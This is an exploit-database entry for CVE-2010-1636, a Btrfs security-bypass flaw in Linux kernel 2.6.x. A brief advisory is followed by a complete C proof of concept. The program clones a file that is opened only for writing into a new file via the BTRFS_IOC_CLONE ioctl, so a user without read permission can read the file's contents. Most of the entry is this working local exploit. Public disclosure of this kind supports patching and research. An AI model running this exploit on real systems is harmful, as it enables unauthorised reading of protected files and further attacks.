Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass Vulnerability

2010-05-18T00:00:00
ID EDB-ID:34001
Type exploitdb
Reporter Dan Rosenberg
Modified 2010-05-18T00:00:00

Description

Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability. CVE-2010-1636. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);

  ioctl(output, BTRFS_IOC_CLONE, target);

}